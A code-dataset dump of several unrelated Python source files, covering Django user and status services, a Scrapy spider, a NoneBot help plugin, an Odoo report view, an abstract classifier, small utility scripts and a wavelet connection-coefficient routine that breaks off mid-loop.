в котором определены ВСЕ атрибуты ПРИВЕЛЕГИЙ\r\n class PermModf_prof создан внутри вызываемой процедуры \"\"\"\r\n\r\n from .serv_advuser import servAdvUser_get_advUser\r\n\r\n class _PermModf_prof:\r\n \"\"\"Вспомогательный класс.\r\n\r\n Формат входящего аргумента arg_dict:\r\n структура dict из sprStatus.any_option\r\n\r\n {exist=\"exist or empty\", mes=\"КраткИнформ\", prof={add_prof:[lst_STATUS], upd_prof:[lst_STATUS] },\r\n err_add=\"Сообщение при отсутствии прав на создПроф\",\r\n err_upd=\"Сообщение при отсутствии на измПроф\" }\r\n \"\"\"\r\n\r\n def __init__(self, arg_status):\r\n self.err_add = None\r\n self.err_upd = None\r\n self.mes = None\r\n\r\n self.perm_addProf = False\r\n self.perm_updProf = False\r\n self.status_modf = None\r\n\r\n #---------- инициализация уровня привилегий пользователя ------------\r\n # ------\r\n self.levelperm = arg_status.levelperm\r\n self.statusID = arg_status.pk\r\n\r\n self._init_perm() # процедурная инициализаци\r\n\r\n # верификация вхождения self.statusID в списки\r\n # допустимых привилегий add_prof and upd_prof\r\n def _init_perm(self):\r\n _statusID = arg_modf[4:]\r\n self.status_modf = _statusID\r\n\r\n status = cls.getStatus_or_None(_statusID)\r\n\r\n # считывание дополнительных параметров из sprStatus.any_option, определяющие\r\n # привилегии изм/созд профиля\r\n # там считываются значения для отображения сообщений отсутствия при��илегий\r\n if status:\r\n any_option = json.loads(status.any_option)\r\n _exist = Res_proc.FN_exist()\r\n\r\n self.mes = any_option['mes']\r\n self.err_add = any_option.get('err_add') or self.mes\r\n self.err_upd = any_option.get('err_upd') or self.mes\r\n\r\n if any_option[_exist] == _exist:\r\n prof = any_option['prof']\r\n if prof:\r\n add_perm = prof.get('add_prof')\r\n upd_perm = prof.get('upd_prof')\r\n if self.statusID in add_perm:\r\n self.perm_addProf = True\r\n if self.statusID in upd_perm:\r\n self.perm_updProf = True\r\n\r\n else:\r\n cls._run_raise(' get_permMod_prof.class PermModf_prof._init_perm status:{0} не определен'.format(_statusID))\r\n\r\n @property\r\n def PR_permAdd(self): return self.perm_addProf\r\n\r\n @property\r\n def PR_permUpd(self): return self.perm_updProf\r\n\r\n def __str__(self):\r\n\r\n s_res = ''\r\n _empty = Res_proc.FN_empty()\r\n\r\n s_err_add = ''\r\n s_err_upd = ''\r\n\r\n if not self.PR_permAdd:\r\n s_err_add = 'err_add:{0}'.format(self.err_add)\r\n if not self.PR_permUpd:\r\n s_err_upd = 'err_upd:{0}'.format(self.err_upd)\r\n\r\n s_res = '{0}: level:{1} modfProf:{2} permAdd:{3} permUpd:{4} {5} {6}'.format(\r\n self.statusID,\r\n self.levelperm,\r\n self.status_modf,\r\n self.PR_permAdd or _empty,\r\n self.PR_permUpd or _empty,\r\n s_err_add,\r\n s_err_upd\r\n )\r\n return s_res\r\n\r\n # ****************** PermModf_prof ********************\r\n\r\n\r\n res = Res_proc()\r\n _status = None\r\n\r\n s_type = type(arg_model).__name__\r\n\r\n try:\r\n\r\n if arg_modf[:3] not in ('add','upd'):\r\n res.error = ('ValueError##cls.SprStatus.get_permMod_prof arg_prof: не соответствие стурктуре формата add_* or upd_*')\r\n return res\r\n\r\n\r\n if s_type == 'AdvUser':\r\n _advuser = arg_model\r\n _status = _advuser.status\r\n\r\n else:\r\n if s_type in ('User','str','int' ):\r\n\r\n # если это суперПользователь разрешить изменение, добавление любого профиля\r\n user = getUser(arg_model)\r\n if user:\r\n if user.is_superuser:\r\n _status = cls.getStatus_or_None(user)\r\n if _status is None:\r\n cls._run_raise(' get_permModf_prof: статус суперПользователя не определен')\r\n\r\n 
permModf = _PermModf_prof( _status )\r\n\r\n res.res = True\r\n res.res_obj = permModf\r\n return res\r\n\r\n else:\r\n res_advUser = servAdvUser_get_advUser(user)\r\n if res_advUser is None:\r\n res.error = ErrorRun_impl('ValueError##cls.SprStatus.get_permMod_prof: нет данных в модели AdvUser')\r\n return res\r\n\r\n _advuser = res_advUser.res_model\r\n _status = _advuser.status\r\n\r\n # ----------------- конец блока верификации и инциализации ------------------\r\n\r\n\r\n\r\n permModf = _PermModf_prof(_status)\r\n\r\n res.res = True\r\n res.res_obj = permModf\r\n\r\n except Exception as ex:\r\n res.error = ex\r\n\r\n return res\r\n# ----------- Конец get_permMod_prof -------------------\r\n\r\n # return statusID or None\r\n \"\"\"\r\n testing 20.05.2020\r\n modul: prtesting.tests.advuser.serv_sprstatus.test_serv_sprstatus\r\n procedure: test_simpl_proc\r\n file: tests.advuser.serv_sprstatus.test_sprstatus_serv.json\r\n \"\"\"\r\n @classmethod\r\n def get_statusID_user(cls, user):\r\n \"\"\" возврString statusId or None\r\n входАргумент user преобразуется/проверяется через getUser(user)\r\n --------------------------------------------------\r\n return statusID_or_None for User \"\"\"\r\n\r\n user = getUser(user)\r\n\r\n if user is None: return None\r\n\r\n _status = cls.getStatus_or_None(user)\r\n if _status is None:\r\n return None\r\n\r\n return _status.pk\r\n\r\n\r\n\r\n #**************** Вспомогательный сервис ****************\r\n\r\n \"\"\"\r\n testing 20.05.2020\r\n modul: prtesting.tests.advuser.serv_sprstatus.test_serv_sprstatus\r\n procedure: test_simpl_proc\r\n file: tests.advuser.serv_sprstatus.test_sprstatus_serv.json\r\n\r\n Выполнено тестирование перечисленных процедур\r\n get_status_qust_simp, get_status_qust_regs\r\n get_status_header, get_status_pradm, get_status_suadm, get_status_notstatus\r\n \"\"\"\r\n @classmethod\r\n def get_status_qust_simp(cls):\r\n \"\"\" return obj_or_None Объект sprStatus for qust-simp гостевой вход \"\"\"\r\n\r\n return cls.getStatus_or_None('qust-simp')\r\n\r\n\r\n @classmethod\r\n def get_status_by_levelperm(cls, arg_levelperm:int):\r\n \"\"\" Выборка объекта Status по значению levelperm\r\n return SprStatus or None\r\n \"\"\"\r\n\r\n from .models import SprStatus\r\n\r\n row = SprStatus.objects.filter(levelperm=arg_levelperm)\r\n if row.exists():\r\n row = row.first()\r\n else:\r\n return None\r\n\r\n return row\r\n\r\n\r\n @classmethod\r\n def get_status_qust_regs(cls):\r\n \"\"\" return obj_or_None Объект sprStatus for qust_regs зарегистрированный клиент \"\"\"\r\n\r\n res = cls.getStatus_or_None('qust-regs')\r\n\r\n return res\r\n\r\n\r\n # объект sprStatus_or_None for руководПроекта\r\n @classmethod\r\n def get_status_header(cls):\r\n \"\"\" return sprStatus_or_None объект sprStatus for proj-head руководитель проекта \"\"\"\r\n\r\n res = cls._get_filter_obj('proj-head')\r\n if not res:\r\n cls._run_raise('Нет данных для руководителя проекта')\r\n\r\n return res\r\n\r\n\r\n # объект sprStatus_or_Exception for руководПроекта\r\n @classmethod\r\n def get_status_pradm(cls):\r\n \"\"\" return obj sprStatus_or_Exception Администратор проекта\"\"\"\r\n\r\n res = cls.getStatus_or_None('proj-sadm')\r\n if not res:\r\n cls._run_raise('Нет данных для администратора проекта')\r\n\r\n return res\r\n\r\n # объект sprStatus_or_Exception for суперПользователя\r\n @classmethod\r\n def get_status_suadm(cls):\r\n \"\"\" return obj sprStatus_or_Exception суперПользователь \"\"\"\r\n\r\n res = cls._get_filter_obj('superuser')\r\n if not res:\r\n 
cls._run_raise('Нет данных для суперпользователя проекта')\r\n\r\n return res\r\n\r\n @classmethod\r\n def get_status_notstatus(cls):\r\n res = cls._get_filter_obj('notstatus')\r\n if not res:\r\n cls._run_raise('Нет данных для notstatus')\r\n\r\n return res\r\n\r\n\r\n\r\n\r\n\r\ndef serv_SprStatus(arg_proc, arg_param=None, **kwargs):\r\n \"\"\" Процедура-диспетчер обработки сервиса\r\n arg_proc стрИдентиф процедуры из Com_proc_sprstatus\r\n arg_dict_param dict параметров:\r\n key - идентифПараметра\r\n val - значениеПараметра \"\"\"\r\n\r\n if not hasattr(Com_proc_sprstatus, arg_proc):\r\n raise ErrorRun_impl('NotData##advuser.serv_sprstatus.serv_SprStatus arg_param не найдена процедура в Com_proc_sprstatus')\r\n\r\n proc = getattr(Com_proc_sprstatus, arg_proc)\r\n\r\n return proc(arg_param, **kwargs)\r\n\r\n\r\n# ------------------- Ссылочный интерфейс процедур обработки данных SprStatus ------------------\r\n\r\ngetStatus_or_None = Com_proc_sprstatus.getStatus_or_None\r\nget_permModf_prof = Com_proc_sprstatus.get_permModf_prof #\r\n","sub_path":"advuser/serv_sprstatus.py","file_name":"serv_sprstatus.py","file_ext":"py","file_size_in_byte":17964,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"334990689","text":"# coding=utf-8\nfrom scrapy import Request\nfrom scrapy import Spider\n\nfrom car_scrapy.items import CarScrapyItem\n\n\nclass KacheSpider(Spider):\n name = \"360che\"\n start_urls = [\n 'http://product.360che.com/'\n ]\n\n def parse(self, response):\n resList1 = response.xpath(u'//h2/a/@href').extract()\n if len(resList1) > 0:\n for i in resList1:\n yield Request('http://product.360che.com'+i, callback=self.parse1)\n resList1 = response.xpath(u'//div[@class=\"article-page\"]/a[last()]/@href').extract()\n if len(resList1) > 0:\n yield Request('http://product.360che.com'+resList1[0], callback=self.parse)\n\n def parse1(self,response):\n item = CarScrapyItem()\n item['url'] = response.url.replace(\"http://product.\", \"http://product.m.\")\n x_path = u'/html/body/div[6]/div[1]/div[2]/div/a[3]/text()'\n resList1 = response.xpath(x_path).extract()\n item['brand'] = resList1[0]\n x_path = u'/html/body/div[6]/div[1]/div[2]/div/a[4]/text()'\n resList1 = response.xpath(x_path).extract()\n item['name'] = resList1[0]\n x_path = u'/html/body/div[6]/div[1]/div[2]/div/a[5]/text()'\n resList1 = response.xpath(x_path).extract()\n item['type'] = resList1[0]\n yield item\n","sub_path":"scrapydeme/car_test/car_scrapy/spiders/360che_spider.py","file_name":"360che_spider.py","file_ext":"py","file_size_in_byte":1302,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"157993987","text":"from nonebot import on_command\nfrom nonebot.plugin.export import export\nfrom nonebot.plugin import get_loaded_plugins\nfrom nonebot.typing import T_State\nfrom nonebot.adapters.cqhttp.bot import Bot\nfrom nonebot.adapters.cqhttp.event import MessageEvent\nfrom nonebot.adapters.cqhttp.permission import GROUP, PRIVATE_FRIEND\nfrom omega_miya.utils.omega_plugin_utils import init_export, init_processor_state, PluginCoolDown\n\n\n# Custom plugin usage text\n__plugin_custom_name__ = '帮助'\n__plugin_usage__ = r'''【帮助】\n一个简单的帮助插件\n\n**Permission**\nFriend Private\nCommand & Lv.10\nor AuthNode\n\n**AuthNode**\nbasic\n\n**Usage**\n/帮助 [插件名]'''\n\n\n# Init plugin export\ninit_export(export(), __plugin_custom_name__, __plugin_usage__)\n\n\n# 注册事件响应器\nbot_help = on_command(\n 'help',\n aliases={'Help', '帮助'},\n # 
使用run_preprocessor拦截权限管理, 在default_state初始化所需权限\n state=init_processor_state(\n name='help',\n command=True,\n level=10,\n cool_down=[\n PluginCoolDown(PluginCoolDown.user_type, 300),\n PluginCoolDown(PluginCoolDown.group_type, 60)\n ]),\n permission=GROUP | PRIVATE_FRIEND,\n priority=10,\n block=True)\n\n\n@bot_help.handle()\nasync def handle_first_receive(bot: Bot, event: MessageEvent, state: T_State):\n # 获取设置了名称的插件列表\n plugins = list(filter(lambda p: set(p.export.keys()).issuperset({'custom_name', 'usage'}), get_loaded_plugins()))\n if not plugins:\n await bot_help.finish('暂时没有可用的插件QAQ')\n state['plugin_list'] = plugins\n # 首次发送命令时跟随的参数,例:/天气 上海,则args为上海\n args = str(event.get_plaintext()).strip().lower().split()\n if args:\n # 如果用户发送了参数则直接赋值\n state['plugin_name'] = args[0]\n else:\n # 如果用户没有发送参数, 则发送功能列表并结束此命令\n plugins_list = '\\n'.join(p.export.custom_name for p in plugins)\n await bot_help.finish(f'我现在支持的插件有: \\n\\n{plugins_list}\\n\\n'\n f'注意: 群组权限等级未达到要求的, 或非好友或未启用私聊功能的命令不会被响应\\n\\n'\n f'输入\"/help [插件]\"即可查看插件详情及帮助')\n\n\n@bot_help.got('plugin_name', prompt='你想查询哪个插件的用法呢?')\nasync def handle_plugin_name(bot: Bot, event: MessageEvent, state: T_State):\n plugin_custom_name = state[\"plugin_name\"]\n # 如果发了参数则发送相应命令的使用帮助\n for p in state['plugin_list']:\n if p.export.custom_name.lower() == plugin_custom_name:\n await bot_help.finish(p.export.usage)\n await bot_help.finish('没有这个插件呢QAQ, 请检查输入插件名是否正确~')\n","sub_path":"omega_miya/plugins/omega_help/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"585691551","text":"from django.contrib import messages\nfrom django.contrib.auth import authenticate, login, logout\nfrom django.shortcuts import render, redirect\nfrom django.core.urlresolvers import reverse\n\nfrom django.http import HttpResponseRedirect, HttpResponseBadRequest, Http404\nfrom .forms import LoginForm, UserCreationForm\nfrom .models import ExtUser\nfrom django.core.mail import send_mail\nfrom django.views import generic\n\n\ndef login_view(request):\n if request.user.is_authenticated():\n return HttpResponseRedirect('/')\n form = LoginForm\n if request.POST:\n form = LoginForm(request.POST)\n if form.is_valid():\n user = authenticate(username=form.cleaned_data['email'], password=form.cleaned_data['password'])\n if user is None:\n form.add_error('password', 'The username and password were incorrect')\n else:\n if user.is_active:\n login(request, user)\n messages.success(request, '{}, добро пожаловать!'.format(user.get_full_name()))\n return HttpResponseRedirect(request.GET.get('next') or '/')\n else:\n form.add_error('email', 'Account is inactive')\n return render(request, 'login.html', {'form': form})\n\n\ndef logout_view(request):\n logout(request)\n return HttpResponseRedirect('/')\n\n\ndef signup_view(request):\n if request.user.is_authenticated():\n return redirect('/')\n form = UserCreationForm\n if request.POST:\n form = UserCreationForm(request.POST)\n if form.is_valid():\n user = form.save()\n activate_link = request.build_absolute_uri(reverse('confirm_email', kwargs={\n 'email': user.email,\n 'confirm_key': str(user.confirm_key)\n }))\n send_mail('ZROCK - Регистрация',\n 'Для активации аккаунта перейдите по ссылке: {}'.format(activate_link),\n 'no-reply@zrock.ru',\n [user.email],\n fail_silently=False,\n html_message='Для активации аккаунта перейдите по ссылке
{0}'.format(\n                          activate_link)\n                      )\n            request.session['email'] = user.email\n            return redirect(reverse('signup_success'))\n    return render(request, 'signup.html', {'form': form})\n\n\ndef signup_success_view(request):\n    email = request.session.get('email')\n    if request.user.is_authenticated() or not email:\n        return redirect('/')\n    return render(request, 'signup-success.html', {'email': email})\n\n\ndef confirm_email_view(request, email, confirm_key):\n    if request.user.is_authenticated():\n        return redirect('/')\n    if not email or not confirm_key:\n        return HttpResponseBadRequest()\n    try:\n        user = ExtUser.objects.get(email=email)\n    except ExtUser.DoesNotExist:\n        return HttpResponseBadRequest()\n\n    if user.confirm_key != confirm_key:\n        return HttpResponseBadRequest()\n    if not user.is_active:\n        user.is_active = True\n        user.save()\n    return render(request, 'confirm-email-success.html', {'email': email})\n\n\n\nclass ProfileView(generic.DetailView):\n    model = ExtUser\n\n\nclass UsersView(generic.ListView):\n    model = ExtUser\n    template_name = 'user_list.html'\n\n    def get_queryset(self):\n        query_set = super().get_queryset()\n        query_set = query_set.filter(is_active=True)\n        return query_set\n","sub_path":"extuser/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3599,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"439122412","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import tools\nfrom odoo import models, fields, api, _\nimport odoo.addons.decimal_precision as dp\nfrom odoo.osv import osv\n\nclass account_invoice_report(models.Model):\n    _inherit = \"account.invoice.report\"\n    \n    currency_rate = fields.Float('Currency Rate', readonly=True, group_operator = 'avg')\n    currency_rate2 = fields.Float('1/Rate', readonly=True, digits_compute=(12,4), group_operator = 'avg')\n    price_subtotal_inv_curr = fields.Float('Base Foreign Currency', readonly=True)\n    invoice_number = fields.Char('Invoice Number', readonly=True)\n    residual2 = fields.Float('Residual Foreign Currency', readonly=True)\n    \n    \n\n    _depends = {\n        'account.invoice': [\n            'number', 'reference',\n        ],\n        'res.currency.rate': ['rate2'],    \n    }\n\n    \n    def init(self):\n        # self._table = account_invoice_report\n        cr = self.env.cr\n        tools.drop_view_if_exists(cr,self._table)\n        cr.execute(\"\"\"CREATE or REPLACE VIEW %s as (\n            WITH currency_rate (currency_id, rate, rate2, date_start, date_end) AS (\n                SELECT r.currency_id, r.rate, r.rate2, left(r.name::text,10)::date AS date_start,\n                    (SELECT left(name::text,10)::date FROM res_currency_rate r2\n                     WHERE left(r2.name::text, 10) > left(r.name::text, 10) AND\n                           r2.currency_id = r.currency_id\n                     ORDER BY r2.name ASC\n                     LIMIT 1) AS date_end\n                FROM res_currency_rate r\n            )\n            %s\n            FROM (\n                %s %s %s\n            ) AS sub\n            JOIN currency_rate cr ON\n                (cr.currency_id = sub.currency_id AND\n                 cr.date_start <= COALESCE(sub.date, NOW()) AND\n                 (cr.date_end IS NULL OR cr.date_end > COALESCE(sub.date, NOW())))\n            )\"\"\" % (\n                self._table,\n                self._select(), self._sub_select(), self._from(), self._group_by()))\n\n    def _select(self):\n        return super(account_invoice_report, self)._select() + \", cr.rate2/sub.nbr as currency_rate2, sub.invoice_number, sub.price_total price_subtotal_inv_curr, sub.residual residual2\"\n\n    def _sub_select(self):\n        return super(account_invoice_report, self)._sub_select() + \", case when ai.reference is not null THEN ai.reference ELSE ai.number END invoice_number\"\n\n    def _group_by(self):\n        return super(account_invoice_report, self)._group_by() + \", 
ai.number, ai.reference, ail.price_subtotal\"\n ","sub_path":"extrasGDL/facturacion/argil_invoice_analysis_extension/account_invoice_report.py","file_name":"account_invoice_report.py","file_ext":"py","file_size_in_byte":2564,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"290059315","text":"import numpy as np\n\nfrom src.pdf_processing.rule_based.AbstractExtractor import extractAbstract, extractAbstractUsingFile\nfrom src.pdf_processing.utils.SentenceTokenizer import SENTENCE_SPLITTER\nfrom src.pdf_processing.utils.WordTokenizer import removeCommonWordsAndTokenize\nfrom src.pdf_processing.vector_based.Label import Label\nfrom src.pdf_processing.vector_based.models.Doc2VecModel import Doc2vecModel\nfrom src.pdf_processing.vector_based.models.FastTextModel import FastTextModel\n\n# model = Doc2vecModel(\"21\")\nmodel = FastTextModel(\"1\")\n\n\ndef processAcademicWork(filePath):\n abstract = extractAbstract(filePath)\n return extractDataFromAbstract(abstract)\n\n\ndef processAcademicWorkFile(file):\n abstract = extractAbstractUsingFile(file)\n return extractDataFromAbstract(abstract)\n\n\ndef extractDataFromAbstract(abstract):\n abstractSentences = SENTENCE_SPLITTER.tokenize(abstract)\n matrix = populatePredictionMatrix(abstractSentences)\n purpoiseSentenceIndex = findPurposeSentenceIndex(matrix)\n rowMaximum = findMaxAcceptableValueInRow(matrix)\n\n result = dict()\n if purpoiseSentenceIndex is None:\n purposeSentence = \"\"\n else:\n purposeSentence = abstractSentences[purpoiseSentenceIndex]\n result.update({Label.PURPOSE.value: purposeSentence})\n\n labels = [e.value for e in Label]\n labels.remove(Label.PURPOSE.value)\n labels.remove(Label.OTHER.value)\n\n for label in labels:\n tasksSentenceIndices = findSentenceIndeces(rowMaximum, label)\n tasks = list()\n for taskSentenceId in tasksSentenceIndices:\n tasks.append(abstractSentences[taskSentenceId])\n record = {label: tasks}\n result.update(record)\n return result\n\n\ndef findSentenceIndeces(rowMaximum, label):\n labels = model.logreg.classes_\n tasksLocation = np.where(labels == label)\n tasksSentenceIndices = np.where(rowMaximum == tasksLocation[0])[0]\n return tasksSentenceIndices\n\n\ndef findPurposeSentenceIndex(matrix):\n labels = model.logreg.classes_\n purposeLocation = np.where(labels == Label.PURPOSE.value)\n\n rowMaximum = findMaxAcceptableValueInRow(matrix)\n if purposeLocation not in rowMaximum:\n return None\n\n columnMaximum = np.argmax(matrix, axis=0)\n purpoiseSentenceIndex = columnMaximum[purposeLocation]\n\n matrix[purpoiseSentenceIndex, :] = 0\n matrix[:, purposeLocation] = 0\n matrix[purpoiseSentenceIndex, purposeLocation] = 1\n return purpoiseSentenceIndex[0]\n\n\ndef findMaxAcceptableValueInRow(matrix):\n maxValuePositionInRow = np.argmax(matrix, axis=1)\n maxValueInRow = np.amax(matrix, axis=1)\n\n acceptableValuePositioninRow = maxValuePositionInRow.copy()\n maskIndices = np.where(maxValueInRow <= 0.5)[0]\n\n acceptableValuePositioninRow[maskIndices] = -1\n return acceptableValuePositioninRow\n\n\ndef populatePredictionMatrix(abstractSentences):\n data = list()\n for idx, sentence in enumerate(abstractSentences):\n sentenceWords = removeCommonWordsAndTokenize(sentence)\n print(sentenceWords)\n if len(sentenceWords) == 1 and sentenceWords[0] == \"SKAITLIS\":\n data.append(np.zeros(len(model.logreg.classes_)))\n continue\n try:\n testSentenceVector = model.calculateSentenceVector(sentenceWords)\n except ValueError:\n 
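# assumption: calculateSentenceVector raises ValueError when no word in the sentence is in the model vocabulary; append a zero row so row indices stay aligned with abstractSentences\n            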
data.append(np.zeros(len(model.logreg.classes_)))\n            continue\n        proba = model.logreg.predict_proba([testSentenceVector])\n        data.append(proba[0])\n    matrix = np.array(data)\n    return matrix\n","sub_path":"src/ui/AcademicWorkProcessor.py","file_name":"AcademicWorkProcessor.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"}
{"seq_id":"519313813","text":"\nfrom cordex import conventions as conv\n\n# create your own filename convention string and list\nfilename_conv_str = 'my_convention_{variable}_{model_id}_{domain_id}.nc'\npath_conv_list = ['model_id','variable']\n\n# create conventions for filename and path\nfilename_conv = conv.FileNameConvention(filename_conv_str)\npath_conv = conv.FilePathConvention(path_conv_list)\n\n\n# now define your attributes to fill the templates.\nroot = '/my_root'\nattributes = {'model_id' : 'GERICS-REMO2015',\n              'variable' : 'pr',\n              'domain_id' : 'EUR-11'}\n\n# create filename and path\nfilename = filename_conv.pattern(**attributes)\npath = path_conv.pattern(root, **attributes)\n\n# create combined file convention\nfile_conv = conv.FileConvention(path_conv, filename_conv)\n\n# create full filename with path\nfile = file_conv.pattern(root, **attributes)\n","sub_path":"examples/convention/convention.py","file_name":"convention.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"297650203","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Apr 15 15:16:16 2019\n\n@author: User1\n\"\"\"\n\ninputString = \"10.254.255.0\"\n\ndef isIPv4Address(inputString):\n    splitString = inputString.split('.')\n    if len(splitString) != 4:\n        return False\n    for string in splitString:\n        if string.isnumeric():\n            if int(string) not in range(256):\n                return False\n        else:\n            return False\n    return True\n\nprint(isIPv4Address(inputString))","sub_path":"isIPv4Address.py","file_name":"isIPv4Address.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"5542081","text":"# Requirement: read a group of worksheets (a subset) from a workbook\n# 2. Filter specific rows in those worksheets (rows in sheets 1-2 with a Sale Amount above $1900.0)\n# method 2: pandas statements\n#!/usr/bin/env python3\n\nimport sys\nimport pandas as pd\n\ninput_file = sys.argv[1]\noutput_file = sys.argv[2]\nmy_sheets = [0,1]\nthreshold = 1900.0\ndata_frame = pd.read_excel(input_file,sheet_name=my_sheets,index_col=None) #sheet_name=None reads all worksheets at once\nrow_list = []\nfor worksheet_name,data in data_frame.items():\n    row_list.append(data[data['Sale Amount'].astype(float)>threshold])\nfilterd_rows = pd.concat(row_list,axis=0,ignore_index=True)\nwriter = pd.ExcelWriter(output_file)\nfilterd_rows.to_excel(writer,sheet_name='set_of_worksheets',index=False)\nwriter.save()","sub_path":"read_excel_file/pandas_meets_condition_set_of_worksheets.py","file_name":"pandas_meets_condition_set_of_worksheets.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"}
{"seq_id":"496345351","text":"#!/usr/bin/python\n\n'''\nCreate a function called make_country, which takes in a country’s name and capital as parameters.\nThen create a dictionary from those parameters, with ‘name’ and ‘capital’ as keys.\nMake the function print out the values of the dictionary to make sure that it works as intended.\n\n'''\n\ndef make_country(name, capital):\n    \n    countries = {\n        'name': name,\n        'capital': capital\n    }\n    
print(countries.values())\n return countries\n\nif __name__ == '__main__':\n make_country('Ukraine', 'Kyiv')\n","sub_path":"Lesson7/task2.py","file_name":"task2.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"105098185","text":"from django.contrib.auth.models import User\nfrom django.db import models\n\n\nclass UserAvatarModel(models.Model):\n user = models.OneToOneField(User, on_delete=models.CASCADE, related_name='user_avatar')\n avatar = models.ImageField(upload_to='avatars')\n update_date = models.DateField(auto_now=True)\n\n class Meta:\n verbose_name = 'User avatar'\n verbose_name_plural = 'User avatars'\n","sub_path":"server/apps/PlacesRemember/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":405,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"127978879","text":"from django.conf.urls import patterns, include, url\n\nfrom dashboard.views import IndexView, CalendarView\n\nurlpatterns = patterns(\"\",\n\turl(r\"^$\", IndexView.as_view(), name=\"dashboard\"),\n\turl(r\"^logout/$\", \"django.contrib.auth.views.logout\",{\"next_page\": \"/\"}, name=\"logout\"),\n\turl(r\"^login/$\", \"django.contrib.auth.views.login\", {\"template_name\": \"dashboard/login.html\"}, name=\"login\"),\n\turl(r\"^calendar/$\", CalendarView.as_view(), name=\"calendar\")\n\n\t)\n","sub_path":"dashboard/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"5"} +{"seq_id":"414071678","text":"\"\"\"\nFalko Giepmans, 05-08-2020\n\nThis is a code to calculate three-term connection coefficients for all(?) finite\nsupported discrete wavelet families on an unbounded interval.\n\nThis is a fix and an elaboration of the code provided by Manuels \n( https://github.com/manuels/db_cc3 ), where three-term connection coefficients\nare calculated for Daubechies wavelets.\n\nMost of this code is based on the equations given in ( Besora, 2004 ), which in\nturn is based on the theory of ( Latto et al, 1992 ). \n\nReferences:\nBesora, J., Galerkin Wavelet Method for Global Waves in 1D, 2004\nGoedecker, S., Wavelets and their application for the solution of partial \n differential equations in physics, 2009\nLatto, A., Resnikoff, H., Tenenbaum, E., The evaluation of connection \n coefficients of compactly supported wavelets, 1992\n\n\"\"\"\n\nimport itertools\nimport warnings\nimport scipy\n\nimport numpy as np\n\nfrom scipy.special import factorial\n\n# =============================================================================\n# \n# =============================================================================\n\ndef moment(a, i, j):\n \"\"\"\n The moment M^j_i for all(?) scaling functions (Goedecker, 2009)\n \n INPUT:\n a : np.array Wavelet filter\n i : int\n j : int\n \n OUTPUT:\n M^j_i : float\n \"\"\"\n N = a.size\n return (i-(int( N/2)-1))**j \n\n\ndef threeterm_connection_coefficients(a, d1, d2, d3):\n \"\"\"\n Calculates the three-term connection coefficients CC^(d1,d2,d3) of a wavelet.\n The three-term connection coefficients (CC) can be directly calculated for \n d1 = 0. 
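(Here CC^(d1,d2,d3)_{l,m} is the integral over x of phi^(d1)(x) * phi_l^(d2)(x) * phi_m^(d3)(x), following Latto et al, 1992.) 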
When d1 is not 0 integration by parts can be used to calculate the CC \n of a summation of other CCs for which d1 = 0.\n \n INPUT:\n a : np.array Wavelet filter\n d1,d2,d3: int Order of derivative\n \n OUTPUT:\n idx : lambda function Plots (l,m) to correct index of CC\n indices : np.array non-zero (l,m) pairs of the connection coefficients\n CC : np.array non-zero connection coefficients \n \"\"\"\n if d1 == 0:\n idx, indices, CC = fundamental_threeterm_connection_coefficients(a, d2, d3)\n return idx,indices, CC\n else:\n idx1,indices1, CC1 = threeterm_connection_coefficients(a, d1-1, d2+1, d3)\n idx2,indices2, CC2 = threeterm_connection_coefficients(a, d1-1, d2, d3+1)\n assert indices1 == indices2\n return idx1,indices1, -CC1 - CC2\n \n\ndef fundamental_threeterm_connection_coefficients(a, d2, d3):\n \"\"\"\n Calculates the three-term connection coefficients CC^(0,d2,d3) of a wavelet.\n \n INPUT:\n a : np.array Wavelet filter\n d2,d3 : int Order of derivative\n \n OUTPUT:\n idx : lambda function Plots (l,m) to correct index of CC\n indices : np.array non-zero (l,m) pairs of the connection coefficients\n CC : np.array non-zero connection coefficients \n \"\"\"\n N = a.size\n d = d2 + d3\n\n Tindices = list(set((l,m) for l,m in itertools.product(range(-(N-2), (N-2)+1), repeat=2)\n if abs(l-m) < (N-1)))\n\n idx = lambda l,m: Tindices.index((l,m))\n\n\n if np.amax([d2,d3]) >= N/2:\n msg = 'Calculation of connection coefficients for {},{} > g = N/2 is invalid!'.format(d2,d3)\n warnings.warn(msg)\n\n\n \"\"\"\n Eigen-value problem due to the scaling equations (Latto et al, 1992):\n \"\"\"\n T = np.zeros([len(Tindices), len(Tindices)])\n \n for l,m in Tindices:\n for i,j,k in itertools.product(range(N), repeat=3):\n if (2*l+j-i, 2*m+k-i) not in Tindices:\n continue # skip the CC which are zero anyway\n T[idx(l,m), idx(2*l+j-i, 2*m+k-i)] += a[i]*a[j]*a[k]\n\n\n T -= 2**(1-d)*np.eye(len(Tindices)) \n b = np.zeros([len(Tindices)])\n\n\n \"\"\"\n The eigen-value problem above is rank-deficient, so extra equations are \n needed to solve the system. We can use a adaptation of the moment equations\n to obtain d1+d2 extra homogenous equations (Latto et al, 1992).\n \"\"\"\n M = np.zeros([d2, len(Tindices)])\n k = 0 if (d3 % 2) == 1 else 1\n \n for q in 